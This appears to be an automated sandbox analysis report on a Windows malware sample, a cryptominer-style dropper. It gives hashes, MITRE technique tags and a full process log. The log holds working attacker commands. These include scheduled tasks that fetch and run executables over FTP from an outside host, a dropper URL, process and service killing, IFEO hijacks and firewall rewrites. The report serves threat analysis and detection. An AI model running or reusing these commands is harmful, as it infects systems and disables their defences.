f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6

Analysis

max time kernel
150s
max time network
124s
platform
windows10_x64
resource
win10v20210408
submitted
07-05-2021 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

updat.dat.exe
Size

307KB
MD5

a6ab2c2fd64e96dcfbf2cef7b2b40863
SHA1

072e8e442c5727d52c42cf892c58cf9f143ed2a7
SHA256

f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6
SHA512

49e83aebe95241348058a5320a8737d0756247892f3b1bfe913bc2a15cf2b1040b88dc897d0b31641d5252740272901d04104cfabb3b32e747489d268eab4de7

Score

10^/10

evasion persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.26.113.95:8095/batpower2.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

19 1940 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

lsma12.exelsma12.exeexcludess.exeexcludess2.exe

pid process

212 lsma12.exe
4932 lsma12.exe
3324 excludess.exe
2340 excludess2.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
19	1940	powershell.exe

pid	process
212	lsma12.exe
4932	lsma12.exe
3324	excludess.exe
2340	excludess2.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\INF\aspnet\lsma12.exe	upx
\??\c:\windows\inf\aspnet\lsma12.exe	upx
C:\Windows\INF\aspnet\lsma12.exe	upx

Drops file in Windows directory 5 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\windows\inf\aspnet\excludess.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\excludess2.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\lsma12.exe	powershell.exe
File created	\??\c:\windows\inf\aspnet\config.json	powershell.exe
File created	\??\c:\windows\update.exe	powershell.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

lsma12.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	lsma12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	lsma12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	lsma12.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3336 schtasks.exe
2148 schtasks.exe
2124 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

648 timeout.exe

pid	process
3336	schtasks.exe
2148	schtasks.exe
2124	schtasks.exe

pid	process
648	timeout.exe

Kills process with taskkill 20 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1524	taskkill.exe
2124	taskkill.exe
5076	taskkill.exe
2432	taskkill.exe
1056	taskkill.exe
4168	taskkill.exe
804	taskkill.exe
1364	taskkill.exe
3892	taskkill.exe
1220	taskkill.exe
1448	taskkill.exe
996	taskkill.exe
1160	taskkill.exe
4204	taskkill.exe
396	taskkill.exe
996	taskkill.exe
1032	taskkill.exe
2568	taskkill.exe
4048	taskkill.exe
2872	taskkill.exe

Modifies registry class 1 IoCs

Processes:

updat.dat.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings updat.dat.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	updat.dat.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exelsma12.exe

pid	process
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe
212	lsma12.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4168	taskkill.exe
Token: SeDebugPrivilege	804	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	2568	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1448	WMIC.exe
Token: SeSecurityPrivilege	1448	WMIC.exe
Token: SeTakeOwnershipPrivilege	1448	WMIC.exe
Token: SeLoadDriverPrivilege	1448	WMIC.exe
Token: SeSystemProfilePrivilege	1448	WMIC.exe
Token: SeSystemtimePrivilege	1448	WMIC.exe
Token: SeProfSingleProcessPrivilege	1448	WMIC.exe
Token: SeIncBasePriorityPrivilege	1448	WMIC.exe
Token: SeCreatePagefilePrivilege	1448	WMIC.exe
Token: SeBackupPrivilege	1448	WMIC.exe
Token: SeRestorePrivilege	1448	WMIC.exe
Token: SeShutdownPrivilege	1448	WMIC.exe
Token: SeDebugPrivilege	1448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1448	WMIC.exe
Token: SeRemoteShutdownPrivilege	1448	WMIC.exe
Token: SeUndockPrivilege	1448	WMIC.exe
Token: SeManageVolumePrivilege	1448	WMIC.exe
Token: 33	1448	WMIC.exe
Token: 34	1448	WMIC.exe
Token: 35	1448	WMIC.exe
Token: 36	1448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1448	WMIC.exe
Token: SeSecurityPrivilege	1448	WMIC.exe
Token: SeTakeOwnershipPrivilege	1448	WMIC.exe
Token: SeLoadDriverPrivilege	1448	WMIC.exe
Token: SeSystemProfilePrivilege	1448	WMIC.exe
Token: SeSystemtimePrivilege	1448	WMIC.exe
Token: SeProfSingleProcessPrivilege	1448	WMIC.exe
Token: SeIncBasePriorityPrivilege	1448	WMIC.exe
Token: SeCreatePagefilePrivilege	1448	WMIC.exe
Token: SeBackupPrivilege	1448	WMIC.exe
Token: SeRestorePrivilege	1448	WMIC.exe
Token: SeShutdownPrivilege	1448	WMIC.exe
Token: SeDebugPrivilege	1448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1448	WMIC.exe
Token: SeRemoteShutdownPrivilege	1448	WMIC.exe
Token: SeUndockPrivilege	1448	WMIC.exe
Token: SeManageVolumePrivilege	1448	WMIC.exe
Token: 33	1448	WMIC.exe
Token: 34	1448	WMIC.exe
Token: 35	1448	WMIC.exe
Token: 36	1448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4008	WMIC.exe
Token: SeSecurityPrivilege	4008	WMIC.exe
Token: SeTakeOwnershipPrivilege	4008	WMIC.exe
Token: SeLoadDriverPrivilege	4008	WMIC.exe
Token: SeSystemProfilePrivilege	4008	WMIC.exe
Token: SeSystemtimePrivilege	4008	WMIC.exe
Token: SeProfSingleProcessPrivilege	4008	WMIC.exe
Token: SeIncBasePriorityPrivilege	4008	WMIC.exe
Token: SeCreatePagefilePrivilege	4008	WMIC.exe
Token: SeBackupPrivilege	4008	WMIC.exe
Token: SeRestorePrivilege	4008	WMIC.exe
Token: SeShutdownPrivilege	4008	WMIC.exe
Token: SeDebugPrivilege	4008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4008	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

updat.dat.exeWScript.execmd.exe

description	pid	process	target process
PID 4804 wrote to memory of 740	4804	updat.dat.exe	WScript.exe
PID 4804 wrote to memory of 740	4804	updat.dat.exe	WScript.exe
PID 4804 wrote to memory of 740	4804	updat.dat.exe	WScript.exe
PID 740 wrote to memory of 3440	740	WScript.exe	cmd.exe
PID 740 wrote to memory of 3440	740	WScript.exe	cmd.exe
PID 740 wrote to memory of 3440	740	WScript.exe	cmd.exe
PID 3440 wrote to memory of 4168	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 4168	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 4168	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 804	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 804	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 804	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 996	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 996	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 996	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1032	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1032	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1032	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1160	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1160	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1160	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1364	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1364	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1364	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1524	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1524	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1524	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 1800	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1800	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1800	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1820	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1820	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1820	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1100	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1100	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 1100	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2080	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2080	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2080	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2292	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2292	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2292	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2500	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2500	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2500	3440	cmd.exe	reg.exe
PID 3440 wrote to memory of 2568	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 2568	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 2568	3440	cmd.exe	taskkill.exe
PID 3440 wrote to memory of 2804	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 2804	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 2804	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 2828	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 2828	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 2828	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 3240	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 3240	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 3240	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 3880	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 3880	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 3880	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 4060	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 4060	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 4060	3440	cmd.exe	cacls.exe
PID 3440 wrote to memory of 4480	3440	cmd.exe	cacls.exe

C:\Users\Admin\AppData\Local\Temp\updat.dat.exe
"C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\windows\TEMP\n.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\temp\c3m.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3440

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im msinfo.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhos.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:804

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhou.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhot.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhous.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoss.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundll32.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:1100

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:2080

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:2292

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
4⤵
PID:2500

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\temp\conhou.exe /e /d system
4⤵
PID:2804

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\temp\conhos.exe /e /d system
4⤵
PID:2828

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\temp\conhot.exe /e /d system
4⤵
PID:3240

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\system\msinfo.exe /e /d system
4⤵
PID:3880

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\debug\item.dat /e /d system
4⤵
PID:4060

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\debug\winu.bat /e /d system
4⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
cmd /c net1 stop ASBservice
4⤵
PID:4068

C:\Windows\SysWOW64\net1.exe
net1 stop ASBservice
5⤵
PID:4332

C:\Windows\SysWOW64\sc.exe
sc delete ASBservice
4⤵
PID:4036

C:\Windows\SysWOW64\net1.exe
net1 stop msupdate
4⤵
PID:4556

C:\Windows\SysWOW64\sc.exe
sc delete msupdate
4⤵
PID:4528

C:\Windows\SysWOW64\net1.exe
net1 stop clr_optimization_v4.0.30328_64
4⤵
PID:4568

C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30328_64
4⤵
PID:1660

C:\Windows\SysWOW64\net1.exe
net1 stop MicrosoftMsql
4⤵
PID:4604

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMsql
4⤵
PID:4596

C:\Windows\SysWOW64\net1.exe
net1 stop netsv
4⤵
PID:4580

C:\Windows\SysWOW64\sc.exe
sc delete netsv
4⤵
PID:1904

C:\Windows\SysWOW64\net1.exe
net1 stop NetworkServices
4⤵
PID:4748

C:\Windows\SysWOW64\sc.exe
sc delete NetworkServices
4⤵
PID:4780

C:\Windows\SysWOW64\net1.exe
net1 stop "Network Remote"
4⤵
PID:4752

C:\Windows\SysWOW64\sc.exe
sc delete "Network Remote"
4⤵
PID:4736

C:\Windows\SysWOW64\net1.exe
net1 stop "WinTaskCtrlService"
4⤵
PID:1300

C:\Windows\SysWOW64\sc.exe
sc delete "WinTaskCtrlService"
4⤵
PID:204

C:\Windows\SysWOW64\net1.exe
net1 stop remotecall
4⤵
PID:4496

C:\Windows\SysWOW64\sc.exe
sc delete remotecall
4⤵
PID:648

C:\Windows\SysWOW64\net1.exe
net1 stop rpcept
4⤵
PID:1528

C:\Windows\SysWOW64\sc.exe
sc delete rpcept
4⤵
PID:2312

C:\Windows\SysWOW64\net1.exe
net1 stop csrss
4⤵
PID:1376

C:\Windows\SysWOW64\sc.exe
sc delete csrss
4⤵
PID:4700

C:\Windows\SysWOW64\net1.exe
net1 stop "windows audio control"
4⤵
PID:1332

C:\Windows\SysWOW64\sc.exe
sc delete "windows audio control"
4⤵
PID:4728

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
4⤵
- Creates scheduled task(s)
PID:3336

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0212.site>ps&echo test>>ps&echo 1433>>ps&echo get sab.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
4⤵
- Creates scheduled task(s)
PID:2148

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F
4⤵
- Creates scheduled task(s)
PID:2124

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindowsa" /F
4⤵
PID:3340

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindowsu" /F
4⤵
PID:2340

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindows" /F
4⤵
PID:1008

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F
4⤵
PID:4048

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
4⤵
PID:3388

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
4⤵
PID:2112

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
4⤵
PID:3848

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete
4⤵
PID:4352

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Mysa3" /F
4⤵
PID:800

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "ok" /F
4⤵
PID:908

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "\Mysa1" /F
4⤵
PID:860

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "WindowsUpdate1" /F
4⤵
PID:996

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "OfficeUpdaterA" /F
4⤵
PID:1052

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F
4⤵
PID:1212

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "WindowsUpdate3" /F
4⤵
PID:1160

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "at6" /F
4⤵
PID:2316

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Windows_Update" /F
4⤵
PID:1500

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update" /F
4⤵
PID:1360

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update2" /F
4⤵
PID:1680

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update4" /F
4⤵
PID:1564

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "Update3" /F
4⤵
PID:1828

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "windowsinit" /F
4⤵
PID:1984

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "System Security Check" /F
4⤵
PID:1344

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
4⤵
PID:1100

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "updat_windows" /F
4⤵
PID:2208

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "at1" /F
4⤵
PID:2376

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete /TN "at2" /F
4⤵
PID:3104

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Delete "\Microsoft\Windows\UPnP\Services" /F
4⤵
PID:2500

C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= auto
4⤵
PID:2096

C:\Windows\SysWOW64\net.exe
net start MpsSvc
4⤵
PID:2560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MpsSvc
5⤵
PID:2808

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete policy name=win
4⤵
PID:2844

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete filterlist name=Allowlist
4⤵
PID:3304

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete filterlist name=denylist
4⤵
PID:3484

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static delete filteraction name=allow
4⤵
PID:2400

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="tcp all" dir=in
4⤵
PID:1852

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
4⤵
PID:4532

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
4⤵
PID:4592

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="tcpall" dir=out
4⤵
PID:1660

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
4⤵
PID:4584

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
4⤵
PID:4640

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
4⤵
PID:4748

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
4⤵
PID:4772

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
4⤵
PID:200

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=win
4⤵
PID:204

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
4⤵
PID:4636

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
4⤵
PID:2188

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
4⤵
PID:1376

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
4⤵
PID:4812

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
4⤵
PID:4728

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
4⤵
PID:3316

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
4⤵
PID:3344

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
4⤵
PID:5008

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:3992

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
4⤵
PID:4220

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=win assign=y
4⤵
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
